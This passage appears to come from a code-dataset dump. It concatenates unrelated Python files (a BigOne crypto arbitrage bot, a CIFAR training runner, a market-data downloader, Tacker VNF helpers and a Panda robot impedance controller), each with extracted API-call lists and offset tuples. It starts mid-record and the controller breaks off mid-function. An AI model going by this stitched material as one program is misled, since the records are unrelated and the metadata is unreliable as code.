'(ground_truth_path)\n', (2569, 2588), False, 'from scipy.io import loadmat\n'), ((2868, 2885), 'math.floor', 'math.floor', (['(w / 8)'], {}), '(w / 8)\n', (2878, 2885), False, 'import math\n'), ((2904, 2921), 'math.floor', 'math.floor', (['(h / 8)'], {}), '(h / 8)\n', (2914, 2921), False, 'import math\n'), ((3937, 3970), 'os.path.exists', 'os.path.exists', (['test_density_path'], {}), '(test_density_path)\n', (3951, 3970), False, 'import os\n'), ((3980, 4007), 'os.mkdir', 'os.mkdir', (['test_density_path'], {}), '(test_density_path)\n', (3988, 4007), False, 'import os\n'), ((4517, 4543), 'scipy.io.loadmat', 'loadmat', (['ground_truth_path'], {}), '(ground_truth_path)\n', (4524, 4543), False, 'from scipy.io import loadmat\n'), ((2532, 2547), 'skimage.color.rgb2gray', 'rgb2gray', (['image'], {}), '(image)\n', (2540, 2547), False, 'from skimage.color import rgb2gray\n'), ((4487, 4502), 'skimage.color.rgb2gray', 'rgb2gray', (['image'], {}), '(image)\n', (4495, 4502), False, 'from skimage.color import rgb2gray\n'), ((3007, 3022), 'random.random', 'random.random', ([], {}), '()\n', (3020, 3022), False, 'import random\n'), ((3081, 3096), 'random.random', 'random.random', ([], {}), '()\n', (3094, 3096), False, 'import random\n')] |
# coding: utf-8
from bigone import BigOneDog
from common import gen_logger
import logging
import time
import json
def strategy_eth_big_bnc_eth(dog):
"""
    Forward: buy BIG/ETH -> sell BIG/BNC -> buy ETH/BNC
    Reverse: sell ETH/BNC -> buy BIG/BNC -> sell BIG/ETH
    :param dog: implementation of BigOneDog
    :return: forward arbitrage return, reverse arbitrage return
"""
big_eth_data = dog.get_order_book('BIG-ETH')
big_bnc_data = dog.get_order_book('BIG-BNC')
eth_bnc_data = dog.get_order_book('ETH-BNC')
print('BIG-ETH')
    print('best ask', big_eth_data['asks'][0]['price'], big_eth_data['asks'][0]['amount'])
    print('best bid', big_eth_data['bids'][0]['price'], big_eth_data['bids'][0]['amount'])
print('BIG-BNC')
    print('best ask', big_bnc_data['asks'][0]['price'], big_bnc_data['asks'][0]['amount'])
    print('best bid', big_bnc_data['bids'][0]['price'], big_bnc_data['bids'][0]['amount'])
print('ETH-BNC')
    print('best ask', eth_bnc_data['asks'][0]['price'], eth_bnc_data['asks'][0]['amount'])
    print('best bid', eth_bnc_data['bids'][0]['price'], eth_bnc_data['bids'][0]['amount'])
# positive transaction
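    # the three 0.999 factors presumably account for a 0.1% trading fee on each of the three legs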
pos_anc = 0.999*0.999*0.999*\
((1 / (float(big_eth_data['asks'][0]['price'])))
* float(big_bnc_data['bids'][0]['price']) )
pos_anc = pos_anc / float(eth_bnc_data['asks'][0]['price']) - 1
# negative transaction
neg_anc = 0.999 * 0.999 * 0.999 * \
(float(eth_bnc_data['bids'][0]['price'])
/ float(big_bnc_data['asks'][0]['price'])
* float(big_eth_data['asks'][0]['price']))
neg_anc = neg_anc / 1 - 1
flag = False
amt = 2.0
if float(big_eth_data['asks'][0]['amount']) >= amt:
if float(big_bnc_data['bids'][0]['amount']) >= amt:
if float(eth_bnc_data['asks'][0]['amount']) >= amt * float(big_eth_data['asks'][0]['price']):
flag = True
msg = "预期本次[正向套利:买BIG/ETH -> 卖BIG/BNC -> 买ETH/BNC]利润:"
if pos_anc < 0.01:
result = "利润空间小于1%, 放弃本次套利 0"
logger.info("{0} {1:.2f}%, {2}".format(msg,pos_anc*100,result))
else:
result = "利润空间大于1%"
if flag is False:
result = "{},{}".format(result,"量不足, 放弃本次套利 0")
logger.info("{0} {1:.2f}%, {2}".format(msg,pos_anc*100,result))
else:
result = "{},{}".format(result,"执行本次套利 1")
logger.info("{0} {1:.2f}%, {2}".format(msg,pos_anc*100,result))
print("{} {} {} {}".format('BIG-ETH','BID', big_eth_data['asks'][0]['price'], str(amt)))
print("{} {} {} {}".format('BIG-BNC','ASK', big_bnc_data['bids'][0]['price'], str(amt)))
print("{} {} {} {}".format('ETH-BNC','BID', eth_bnc_data['asks'][0]['price'],
str(amt * float(big_eth_data['asks'][0]['price']))))
# dog.create_order('BIG-ETH','ASK', big_eth_data['asks'][0]['price'], '2.0')
# dog.create_order('BIG-BNC','BID', big_bnc_data['bids'][0]['price'], '2.0')
# dog.create_order('ETH-BNC','ASK', eth_bnc_data['asks'][0]['price'],
# str(2.0 * float(big_eth_data['asks'][0]['price'])))
return True
if neg_anc < 0.01:
result = "利润空间小于1%, 放弃本次套利 0"
else:
result = "利润空间大于1%, 执行本次套利 1"
logger.info("预期本次[反向套利:卖ETH/BNC -> 买BIG/BNC -> 卖BIG/ETH]利润: {0:.2f}%, {1}".format(neg_anc*100,result))
return False
# return pos_anc, neg_anc
def strategy_eth_bnc(dog):
eth_bnc_data = dog.get_order_book('ETH-BNC')
print('ETH-BNC')
    print('best ask', eth_bnc_data['asks'][0]['price'], eth_bnc_data['asks'][0]['amount'])
    print('best bid', eth_bnc_data['bids'][0]['price'], eth_bnc_data['bids'][0]['amount'])
anc = float(eth_bnc_data['asks'][0]['price']) / float(eth_bnc_data['bids'][0]['price']) - 1
print(anc)
if anc > 0.02:
r = dog.create_order('ETH-BNC', 'BID', str(float(eth_bnc_data['bids'][0]['price'])+0.01), '0.01' )
bid_order_id = r['order_id']
r = dog.create_order('ETH-BNC', 'ASK', str(float(eth_bnc_data['asks'][0]['price'])-0.01), '0.01' )
ask_order_id = r['order_id']
return anc, anc
if __name__ == '__main__':
gen_logger('bigonetest')
logger = logging.getLogger("bigone")
with open("PRIVATE_KEY.json",'r') as f:
private_key = json.load(f)["key"]
dog = BigOneDog(private_key)
# strategy_eth_bnc(dog)
# dog.get_orders("ETH-BNC",'10')
# r = dog.get_order("b79ef031-c477-46f9-b452-7e97aa97435d")
# print(r)
# r = dog.get_orders('ETH-BNC','10')
# print(r)
while True:
flag = strategy_eth_big_bnc_eth(dog)
if flag is True:
break
else:
print("休眠10秒")
print("")
time.sleep(10)
# break
# pos_anc, neg_anc = strategy_eth_bnc(dog)
# if pos_anc < 0.01:
# result = "利润空间小于1%, 放弃本次套利 0"
# else:
# result = "利润空间大于1%, 执行本次套利 1"
#
# logger.info("预期本次[正向套利:买BIG/ETH -> 卖BIG/BNC -> 买ETH/BNC]利润: {0:.2f}%, {1}".format(pos_anc*100,result))
#
# if neg_anc < 0.01:
# result = "利润空间小于1%, 放弃本次套利 0"
# else:
# result = "利润空间大于1%, 执行本次套利 1"
#
# logger.info("预期本次[反向套利:卖ETH/BNC -> 买BIG/BNC -> 卖BIG/ETH]利润: {0:.2f}%, {1}".format(neg_anc*100,result))
#
# print("休眠10秒")
# print("")
# time.sleep(10)
| [
"logging.getLogger",
"time.sleep",
"common.gen_logger",
"json.load",
"bigone.BigOneDog"
]
| [((4131, 4155), 'common.gen_logger', 'gen_logger', (['"""bigonetest"""'], {}), "('bigonetest')\n", (4141, 4155), False, 'from common import gen_logger\n'), ((4169, 4196), 'logging.getLogger', 'logging.getLogger', (['"""bigone"""'], {}), "('bigone')\n", (4186, 4196), False, 'import logging\n'), ((4294, 4316), 'bigone.BigOneDog', 'BigOneDog', (['private_key'], {}), '(private_key)\n', (4303, 4316), False, 'from bigone import BigOneDog\n'), ((4264, 4276), 'json.load', 'json.load', (['f'], {}), '(f)\n', (4273, 4276), False, 'import json\n'), ((4698, 4712), 'time.sleep', 'time.sleep', (['(10)'], {}), '(10)\n', (4708, 4712), False, 'import time\n')] |
import os
import yaml
import logging
import importlib
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
logging.getLogger('tensorflow').disabled = True
from cifar_training_tools import cifar_training, cifar_error_test
def print_dict(d, tabs=0):
tab = '\t'
for key in d:
if type(d[key]) == dict:
print(f"{tab*tabs}{key}:")
print_dict(d[key], tabs+1)
else:
print(f"{tab*tabs}{key}: {d[key]}")
print('\n' + '#' * 19)
print("TESTING FOR ERRORS!")
print('#' * 19)
stream = open('experiments.yaml', 'r')
for exp in yaml.safe_load_all(stream):
if 'skip_error_test' in exp and exp['skip_error_test']:
continue
model = getattr(importlib.import_module(exp['module']), exp['model'])
cifar_error_test(model(**exp['model_parameters']))
print("OK!")
print('\n' + '#' * 22)
print("MODEL TRAINING BEGINS!")
print('#' * 22)
stream = open('experiments.yaml', 'r')
for exp in yaml.safe_load_all(stream):
print(); print_dict(exp); print();
model = getattr(importlib.import_module(exp['module']), exp['model'])
cifar_training(model(**exp['model_parameters']), **exp['train_parameters']) | [
"logging.getLogger",
"importlib.import_module",
"yaml.safe_load_all"
]
| [((578, 604), 'yaml.safe_load_all', 'yaml.safe_load_all', (['stream'], {}), '(stream)\n', (596, 604), False, 'import yaml\n'), ((966, 992), 'yaml.safe_load_all', 'yaml.safe_load_all', (['stream'], {}), '(stream)\n', (984, 992), False, 'import yaml\n'), ((96, 127), 'logging.getLogger', 'logging.getLogger', (['"""tensorflow"""'], {}), "('tensorflow')\n", (113, 127), False, 'import logging\n'), ((712, 750), 'importlib.import_module', 'importlib.import_module', (["exp['module']"], {}), "(exp['module'])\n", (735, 750), False, 'import importlib\n'), ((1058, 1096), 'importlib.import_module', 'importlib.import_module', (["exp['module']"], {}), "(exp['module'])\n", (1081, 1096), False, 'import importlib\n')] |
# -*- coding: utf-8 -*-
import os,sys
from PyQt4 import QtGui,QtCore
dataRoot = os.path.abspath(os.path.join(os.path.dirname(__file__),os.pardir,os.pardir,'histdata'))
sys.path.append(dataRoot)
import dataCenter as dataCenter
from data.mongodb.DataSourceMongodb import Mongodb
import datetime as dt
def getSymbols():
    #mid 1) Get the symbol codes below (copy-pasted in from Excel)
codesStr = """
XAGUSD
"""
    #mid 2) Split the string into a list with split(); by default this strips \n and all whitespace.
#codeList = ['000021.SZ','000022.SZ']
codeList = [code.split('.')[0] for code in codesStr.split()]
return codeList
def subMain():
DC = dataCenter.dataCenter()
remoteDataSourceType = 'mt5'
localStorageType = 'mongodb'
periodType = 'D'
timeStart = dt.datetime(2000,10,20)
timeEnd = dt.datetime.now()
# 1)get codes form eastmoney
codeList = getSymbols()
# 2)download history data
dataDict = DC.downloadHistData(providerType=remoteDataSourceType,storageType=localStorageType,periodType=periodType,
codeList=codeList,timeFrom = timeStart,timeTo = timeEnd)
if __name__ == '__main__':
#app = QtGui.QApplication(sys.argv)
#mid-----------------------------------------------------------------------------------------------------------------------------
subMain()
#mid-----------------------------------------------------------------------------------------------------------------------------
#sys.exit(app.exec_()) | [
"datetime.datetime",
"datetime.datetime.now",
"os.path.dirname",
"dataCenter.dataCenter",
"sys.path.append"
]
| [((177, 202), 'sys.path.append', 'sys.path.append', (['dataRoot'], {}), '(dataRoot)\n', (192, 202), False, 'import os, sys\n'), ((629, 652), 'dataCenter.dataCenter', 'dataCenter.dataCenter', ([], {}), '()\n', (650, 652), True, 'import dataCenter as dataCenter\n'), ((762, 787), 'datetime.datetime', 'dt.datetime', (['(2000)', '(10)', '(20)'], {}), '(2000, 10, 20)\n', (773, 787), True, 'import datetime as dt\n'), ((800, 817), 'datetime.datetime.now', 'dt.datetime.now', ([], {}), '()\n', (815, 817), True, 'import datetime as dt\n'), ((110, 135), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (125, 135), False, 'import os, sys\n')] |
# Copyright (C) 2021 Nippon Telegraph and Telephone Corporation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log as logging
from tacker.sol_refactored.common import exceptions as sol_ex
from tacker.sol_refactored import objects
LOG = logging.getLogger(__name__) # not used at the moment
def get_inst(context, inst_id):
inst = objects.VnfInstanceV2.get_by_id(context, inst_id)
if inst is None:
raise sol_ex.VnfInstanceNotFound(inst_id=inst_id)
return inst
def get_inst_all(context):
return objects.VnfInstanceV2.get_all(context)
def inst_href(inst_id, endpoint):
return "{}/v2/vnflcm/vnf_instances/{}".format(endpoint, inst_id)
def make_inst_links(inst, endpoint):
links = objects.VnfInstanceV2_Links()
self_href = inst_href(inst.id, endpoint)
links.self = objects.Link(href=self_href)
if inst.instantiationState == 'NOT_INSTANTIATED':
links.instantiate = objects.Link(href=self_href + "/instantiate")
else: # 'INSTANTIATED'
links.terminate = objects.Link(href=self_href + "/terminate")
# TODO(oda-g): add when the operation supported
# links.scale = objects.Link(href = self_href + "/scale")
# etc.
return links
# see IETF RFC 7396
def json_merge_patch(target, patch):
if isinstance(patch, dict):
if not isinstance(target, dict):
target = {}
for key, value in patch.items():
if value is None:
if key in target:
del target[key]
else:
target[key] = json_merge_patch(target.get(key), value)
return target
else:
return patch
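# Illustrative example of the merge-patch semantics implemented above (values are
# hypothetical): json_merge_patch({"a": 1, "b": 2}, {"b": None, "c": 3}) -> {"a": 1, "c": 3}
# A None value in the patch removes the key; nested dicts are merged recursively.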
def select_vim_info(vim_connection_info):
# NOTE: It is assumed that vimConnectionInfo has only one item
# at the moment. If there are multiple items, it is uncertain
# which item is selected.
for vim_info in vim_connection_info.values():
return vim_info
| [
"tacker.sol_refactored.objects.Link",
"tacker.sol_refactored.objects.VnfInstanceV2.get_by_id",
"tacker.sol_refactored.objects.VnfInstanceV2.get_all",
"oslo_log.log.getLogger",
"tacker.sol_refactored.common.exceptions.VnfInstanceNotFound",
"tacker.sol_refactored.objects.VnfInstanceV2_Links"
]
| [((812, 839), 'oslo_log.log.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (829, 839), True, 'from oslo_log import log as logging\n'), ((911, 960), 'tacker.sol_refactored.objects.VnfInstanceV2.get_by_id', 'objects.VnfInstanceV2.get_by_id', (['context', 'inst_id'], {}), '(context, inst_id)\n', (942, 960), False, 'from tacker.sol_refactored import objects\n'), ((1096, 1134), 'tacker.sol_refactored.objects.VnfInstanceV2.get_all', 'objects.VnfInstanceV2.get_all', (['context'], {}), '(context)\n', (1125, 1134), False, 'from tacker.sol_refactored import objects\n'), ((1291, 1320), 'tacker.sol_refactored.objects.VnfInstanceV2_Links', 'objects.VnfInstanceV2_Links', ([], {}), '()\n', (1318, 1320), False, 'from tacker.sol_refactored import objects\n'), ((1383, 1411), 'tacker.sol_refactored.objects.Link', 'objects.Link', ([], {'href': 'self_href'}), '(href=self_href)\n', (1395, 1411), False, 'from tacker.sol_refactored import objects\n'), ((996, 1039), 'tacker.sol_refactored.common.exceptions.VnfInstanceNotFound', 'sol_ex.VnfInstanceNotFound', ([], {'inst_id': 'inst_id'}), '(inst_id=inst_id)\n', (1022, 1039), True, 'from tacker.sol_refactored.common import exceptions as sol_ex\n'), ((1494, 1539), 'tacker.sol_refactored.objects.Link', 'objects.Link', ([], {'href': "(self_href + '/instantiate')"}), "(href=self_href + '/instantiate')\n", (1506, 1539), False, 'from tacker.sol_refactored import objects\n'), ((1594, 1637), 'tacker.sol_refactored.objects.Link', 'objects.Link', ([], {'href': "(self_href + '/terminate')"}), "(href=self_href + '/terminate')\n", (1606, 1637), False, 'from tacker.sol_refactored import objects\n')] |
#! /usr/bin/env python
import copy
from copy import deepcopy
import rospy
import threading
import quaternion
import numpy as np
from geometry_msgs.msg import Point
from visualization_msgs.msg import *
from franka_interface import ArmInterface
from panda_robot import PandaArm
import matplotlib.pyplot as plt
from scipy.spatial.transform import Rotation
np.set_printoptions(precision=2)
"""
This is a FORCE-BASED VARIABLE IMPEDANCE CONTROLLER based on [Huang1992: Compliant Motion Control of Robots by Using Variable Impedance]
To achieve force tracking, the apparent stiffness (K) and damping (B) is dynamically adjusted through functions dependent on the error in position, velocity and force
About the code/controller:
1] Only stiffness and damping in the 'z'-direction is adaptive, the rest are static
2] Due to the faulty joint velocities (read from rostopics), the noisier,
            numerically derived derivatives of the joint position are preferred
                for use in the controller { get_x_dot(..., numerically = True) }
3] You can now choose between perform_torque_Huang1992() and perform_torque_DeSchutter()
        - DeSchutter's control-law offers geometrically consistent stiffness and is more computationally expensive
4] The default desired motion- and force-trajectories are now made in a time-consistent manner, so that the PUBLISH RATE can be altered without messing up the desired behaviour.
The number of iterations is calculated as a function of the controller's control-cycle, T: (max_num_it = duration(=15 s) / T)
"""
# --------- Constants -----------------------------
#print(robot.joint_ordered_angles()) #Read the robot's joint-angles
#new_start = {'panda_joint1': 1.938963389436404, 'panda_joint2': 0.6757504724282993, 'panda_joint3': -0.43399745125475564, 'panda_joint4': -2.0375275954865573, 'panda_joint5': -0.05233040021194351, 'panda_joint6': 3.133254153457202, 'panda_joint7': 1.283328743909796}
# Stiffness
Kp = 30
Kpz = 30 #initial value (adaptive)
Ko = 900
K = np.array([[Kp, 0, 0, 0, 0, 0],
[0, Kp, 0, 0, 0, 0],
[0, 0, Kpz, 0, 0, 0],
[0, 0, 0, Ko, 0, 0],
[0, 0, 0, 0, Ko, 0],
[0, 0, 0, 0, 0, Ko]])
# Damping
Bp = Kp/7
Bpz = Bp # #initial value (adaptive)
Bo = 50
B = np.array([[Bp, 0, 0, 0, 0, 0],
[0, Bp, 0, 0, 0, 0],
[0, 0, Bpz, 0, 0, 0],
[0, 0, 0, Bo, 0, 0],
[0, 0, 0, 0, Bo, 0],
[0, 0, 0, 0, 0, Bo]])
# Apparent inertia
Mp = 10
Mo = 10
M_diag = np.array([Mp,Mp,Mp,Mo,Mo,Mo])
M = np.diagflat(M_diag)
# Constant matrices appearing in equation (50) of [Huang1992]
K_v = np.identity(6)
P = np.identity(6)
gamma = np.identity(18)
#gamma_M = 12
gamma_B = 0.001 #2 # The damping's rate of adaptivity (high value = slow changes)
gamma_K = 0.0005 #1 # The stiffness' rate of adaptivity (high value = slow changes)
#gamma[2,2] = gamma_M
gamma[8,8] = gamma_B
gamma[14,14] = gamma_K
duration = 15 #seconds SHOULD NOT BE ALTERED
"""Functions for generating desired MOTION trajectories"""
#1 Generate a desired trajectory for the manipulator to follow
def generate_desired_trajectory(iterations,T):
a = np.zeros((6,iterations))
v = np.zeros((6,iterations))
p = np.zeros((3,iterations))
p[:,0] = get_p()
if iterations > 300:
a[2,0:100]=-0.00001/T**2
a[2,250:350]=0.00001/T**2
if iterations > 6500:
a[0,4500:4510]=0.00001/T**2
a[0,6490:6500]=-0.00001/T**2
    for i in range(iterations):
if i>0:
v[:,i]=v[:,i-1]+a[:,i-1]*T
p[:,i]=p[:,i-1]+v[:3,i-1]*T
return a,v,p
#2 Generate a desired trajectory for the manipulator to follow
def generate_desired_trajectory_express(iterations,T):
a = np.zeros((6,iterations))
v = np.zeros((6,iterations))
p = np.zeros((3,iterations))
p[:,0] = get_p()
if iterations > 175:
a[2,0:50]=-0.00002/T**2
a[2,125:175]=0.00002/T**2
if iterations > 3250:
a[0,2250:2255]=0.00002/T**2
a[0,3245:3250]=-0.00002/T**2
    for i in range(iterations):
if i>0:
v[:,i]=v[:,i-1]+a[:,i-1]*T
p[:,i]=p[:,i-1]+v[:3,i-1]*T
return a,v,p
#3 Generate a (time-consistent) desired motion trajectory
def generate_desired_trajectory_tc(iterations,T,move_in_x=False):
a = np.zeros((6,iterations))
v = np.zeros((6,iterations))
p = np.zeros((3,iterations))
p[:,0] = get_p()
a[2,0:int(iterations/75)]=-1.25
a[2,int(iterations*2/75):int(iterations/25)]= 1.25
if move_in_x:
a[0,int(iterations*3/5):int(iterations*451/750)]=1.25
a[0,int(iterations*649/750):int(iterations*13/15)]=-1.25
    for i in range(iterations):
if i>0:
v[:,i]=v[:,i-1]+a[:,i-1]*T
p[:,i]=p[:,i-1]+v[:3,i-1]*T
return a,v,p
"""Functions for generating desired FORCE trajectories"""
#1 Generate a desired force trajectory
def generate_F_d(max_num_it,T):
a = np.zeros((6,max_num_it))
v = np.zeros((6,max_num_it))
s = np.zeros((6,max_num_it))
a[2,0:100] = 0.0005/T**2
a[2,100:200] = - 0.0005/T**2
if max_num_it > 1100:
a[2,500:550] = 0.0002/T**2
if max_num_it >4001:
a[2,1500:1550]=-0.0002/T**2
it = 2000
while it <= 4000:
a[2,it]= (-9*(np.pi**2)*(T/4)**2*np.sin(it*T/4*2*np.pi+np.pi/2))/T**2
it+=1
a[2,4001]=0.0001/T**2
for i in range(max_num_it):
if i>0:
v[2,i]=v[2,i-1]+a[2,i-1]*T
s[2,i]=s[2,i-1]+v[2,i-1]*T
return s
#2 Generate an efficient desired force trajectory
def generate_F_d_express(max_num_it,T):
a = np.zeros((6,max_num_it))
v = np.zeros((6,max_num_it))
s = np.zeros((6,max_num_it))
a[2,0:50] = 0.0010/T**2
a[2,100:150] = - 0.0010/T**2
if max_num_it > 275:
a[2,250:275] = 0.0008/T**2
if max_num_it >2001:
a[2,750:775]=-0.0008/T**2
it = 1000
while it <= 2000:
a[2,it]= (-9*(np.pi**2)*(T/4)**2*np.sin(2*it*T/4*2*np.pi+np.pi/2))/T**2
it+=1
a[2,2001]=0.0001/T**2
for i in range(max_num_it):
if i>0:
v[2,i]=v[2,i-1]+a[2,i-1]*T
s[2,i]=s[2,i-1]+v[2,i-1]*T
return s
#3 Generate a (time-consistent) desired force trajectory
def generate_F_d_tc(max_num_it,T):
a = np.zeros((6,max_num_it))
v = np.zeros((6,max_num_it))
s = np.zeros((6,max_num_it))
a[2,0:int(max_num_it/75)] = 62.5
a[2,int(max_num_it/37.5):int(max_num_it/25)] = - 62.5
if max_num_it > 275:
a[2,int(max_num_it/15):int(max_num_it*11/150)] = 50
if max_num_it >2001:
a[2,int(max_num_it/5):int(max_num_it*31/150)]=-50
it = int(max_num_it*4/15)
while it <= int(max_num_it*8/15):
a[2,it]= (-9*(np.pi**2)*(T/4)**2*np.sin(2*it*T/4*2*np.pi+np.pi/2))/T**2
it+=1
a[2,int(max_num_it*8/15+1)]=6.25
for i in range(max_num_it):
if i>0:
v[2,i]=v[2,i-1]+a[2,i-1]*T
s[2,i]=s[2,i-1]+v[2,i-1]*T
return s
# ------------ Helper functions --------------------------------
# Calculate the numerical derivative of a each row in a vector
def get_derivative_of_vector(history,iteration,T):
size = history.shape[0]
if iteration > 0:
return np.subtract(history[:,iteration],history[:,iteration-1])/T
else:
return np.zeros(size)
# Saturation-function
def ensure_limits(lower,upper,matrix):
for i in range(6):
if matrix[i,i] > upper:
matrix[i,i] = upper
elif matrix[i,i] < lower:
matrix[i,i] = lower
# Return the cartesian (task-space) inertia of the manipulator [alternatively the inverse of it]
def get_W(inv = False):
W = np.linalg.multi_dot([robot.jacobian(),np.linalg.inv(robot.joint_inertia_matrix()),robot.jacobian().T])
if inv == True:
return np.linalg.inv(W)
else:
return W
# Return the external forces (everything except for z-force is set to 0 due to offsets)
def get_F_ext(two_dim = False):
if two_dim == True:
return np.array([0,0,robot.endpoint_effort()['force'][2],0,0,0]).reshape([6,1])
else:
return np.array([0,0,robot.endpoint_effort()['force'][2],0,0,0])
# Return the position and (relative) orientation
def get_x(goal_ori):
pos_x = robot.endpoint_pose()['position']
rel_ori = quatdiff_in_euler_radians(goal_ori, np.asarray(robot.endpoint_pose()['orientation']))
return np.append(pos_x,rel_ori)
# Return the linear and angular velocities
# Numerically = True -> return the derivarive of the state-vector
# Numerically = False -> read values from rostopic (faulty in sim when interacting with the environment)
def get_x_dot(x_hist,i,T, numerically=False):
if numerically == True:
return get_derivative_of_vector(x_hist,i,T)
else:
return np.append(robot.endpoint_velocity()['linear'],robot.endpoint_velocity()['angular'])
# Return the error in position and orientation
def get_delta_x(goal_ori, p_d, two_dim = False):
delta_pos = p_d - robot.endpoint_pose()['position']
delta_ori = quatdiff_in_euler_radians(np.asarray(robot.endpoint_pose()['orientation']), goal_ori)
if two_dim == True:
return np.array([np.append(delta_pos,delta_ori)]).reshape([6,1])
else:
return np.append(delta_pos,delta_ori)
# Return the error in linear and angular velocities
def get_x_dot_delta(x_d_dot,x_dot, two_dim = True):
if two_dim == True:
return (x_d_dot - x_dot).reshape([6,1])
else:
return x_d_dot - x_dot
# Return the error in linear and angular acceleration
def get_x_ddot_delta(x_d_ddot,v_history,i,T):
a = get_derivative_of_vector(v_history,i,T)
return x_d_ddot-a
# Return the cartesian (task-space) position
def get_p(two_dim=False):
if two_dim == True:
return robot.endpoint_pose()['position'].reshape([3,1])
else:
return robot.endpoint_pose()['position']
# Compute difference between quaternions and return Euler angle in radians as difference
def quatdiff_in_euler_radians(quat_curr, quat_des):
curr_mat = quaternion.as_rotation_matrix(quat_curr)
des_mat = quaternion.as_rotation_matrix(quat_des)
rel_mat = des_mat.T.dot(curr_mat)
rel_quat = quaternion.from_rotation_matrix(rel_mat)
vec = quaternion.as_float_array(rel_quat)[1:]
if rel_quat.w < 0.0:
vec = -vec
return -des_mat.dot(vec)
# -------------- Main functions --------------------
# Get xi as it is described in equation (44) in [Huang1992]
def get_xi(goal_ori, p_d, x_dot, x_d_dot, x_d_ddot, v_history, i, T):
E = -get_delta_x(goal_ori, p_d)
E_dot = -get_x_dot_delta(x_d_dot,x_dot, two_dim = False)
E_ddot = -get_x_ddot_delta(x_d_ddot,v_history,i,T)
E_diag = np.diagflat(E)
E_dot_diag = np.diagflat(E_dot)
E_ddot_diag = np.diagflat(E_ddot)
return np.block([E_ddot_diag,E_dot_diag,E_diag])
# Calculate lambda_dot as in equation (50) in [Huang1992]
def get_lambda_dot(gamma,xi,K_v,P,F_d):
return np.linalg.multi_dot([-np.linalg.inv(gamma),xi.T,np.linalg.inv(K_v),P,get_F_ext(two_dim=True)-F_d.reshape([6,1])])
# Return the updated (adapted) Inertia, Damping and Stiffness matrices.
def update_MBK_hat(lam,M,B,K):
M_hat = M # + np.diagflat(lam[0:6]) M is chosen to be constant
B_hat = B + np.diagflat(lam[6:12])
K_hat = K + np.diagflat(lam[12:18])
#ensure_limits(1,5000,M_hat)
ensure_limits(1,5000,B_hat)
ensure_limits(1,5000,K_hat)
return M_hat, B_hat, K_hat
# Calculate and perform the torque as in equation (10) in [Huang1992]
def perform_torque_Huang1992(M, B, K, x_d_ddot, x_d_dot,x_dot, p_d, goal_ori):
a = np.linalg.multi_dot([robot.jacobian().T,get_W(inv=True),np.linalg.inv(M)])
b = np.array([np.dot(M,x_d_ddot)]).reshape([6,1]) + np.array([np.dot(B,get_x_dot_delta(x_d_dot,x_dot))]).reshape([6,1]) + np.array([np.dot(K,get_delta_x(goal_ori,p_d,two_dim = True))]).reshape([6,1])
c = robot.coriolis_comp().reshape([7,1])
d = (np.identity(6)-np.dot(get_W(inv=True),np.linalg.inv(M))).reshape([6,6])
total_torque = np.array([np.dot(a,b)]).reshape([7,1]) + c + np.array([np.linalg.multi_dot([robot.jacobian().T,d,get_F_ext()])]).reshape([7,1])
robot.set_joint_torques(dict(list(zip(robot.joint_names(),total_torque))))
"""
TESTING AREA (Functions needed to run an adaptive version of DeSchutter's impedance controller)
[with geometrically consistent stiffness]
"""
def skew(vector):
return np.array([[0, -vector[2], vector[1]],
[vector[2], 0, -vector[0]],
[-vector[1], vector[0], 0]])
def from_three_to_six_dim(matrix):
return np.block([[matrix,np.zeros((3,3))],[np.zeros((3,3)),matrix]])
def get_K_Pt_dot(R_d,K_pt,R_e):
return np.array([0.5*np.linalg.multi_dot([R_d,K_pt,R_d.T])+0.5*np.linalg.multi_dot([R_e,K_pt,R_e.T])])
def get_K_Pt_ddot(p_d,R_d,K_pt):
return np.array([0.5*np.linalg.multi_dot([skew(p_d-robot.endpoint_pose()['position']),R_d,K_pt,R_d.T])])
def E_quat(quat_n,quat_e):
return np.dot(quat_n,np.identity(3))-skew(quat_e)
def get_K_Po_dot(quat_n,quat_e,R_e,K_po):
return np.array([2*np.linalg.multi_dot([E_quat(quat_n,quat_e).T,R_e,K_po,R_e.T])])
def get_h_delta(K_pt_dot,K_pt_ddot,p_delta,K_po_dot,quat_e):
f_delta_t = np.array([np.dot(K_pt_dot,p_delta)])
m_delta_t = np.array([np.dot(K_pt_ddot,p_delta)])
null = np.zeros((3,1))
m_delta_o = np.array([np.dot(K_po_dot,quat_e)])
return np.array([np.append(f_delta_t.T,m_delta_t.T)]).T + np.array([np.append(null.T,m_delta_o.T)]).T
def perform_torque_DeSchutter(M, B, K, x_d_ddot, x_d_dot,x_dot, p_d, Rot_d): # must include Rot_d
J = robot.jacobian()
Rot_e = robot.endpoint_pose()['orientation_R']
Rot_e_bigdim = from_three_to_six_dim(Rot_e)
Rot_e_dot = np.dot(skew(robot.endpoint_velocity()['angular']),Rot_e) #not a 100 % sure about this one
Rot_e_dot_bigdim = from_three_to_six_dim(Rot_e_dot)
quat = quaternion.from_rotation_matrix(np.dot(Rot_e.T,Rot_d)) #orientational displacement represented as a unit quaternion
#quat = robot.endpoint_pose()['orientation']
quat_e_e = np.array([quat.x,quat.y,quat.z]) # vector part of the unit quaternion in the frame of the end effector
quat_e = np.dot(Rot_e.T,quat_e_e) # ... in the base frame
quat_n = quat.w
p_delta = p_d-robot.endpoint_pose()['position']
K_Pt_dot = get_K_Pt_dot(Rot_d,K[:3,:3],Rot_e)
K_Pt_ddot = get_K_Pt_ddot(p_d,Rot_d,K[:3,:3])
K_Po_dot = get_K_Po_dot(quat_n,quat_e,Rot_e,K[3:,3:])
h_delta_e = np.array(np.dot(Rot_e_bigdim,get_h_delta(K_Pt_dot,K_Pt_ddot,p_delta,K_Po_dot,quat_e))).reshape([6,1])
h_e = get_F_ext(two_dim=True)
h_e_e = np.array(np.dot(Rot_e_bigdim,h_e))
a_d_e = np.dot(Rot_e_bigdim,x_d_ddot).reshape([6,1])
v_d_e = np.dot(Rot_e_bigdim,x_d_dot).reshape([6,1])
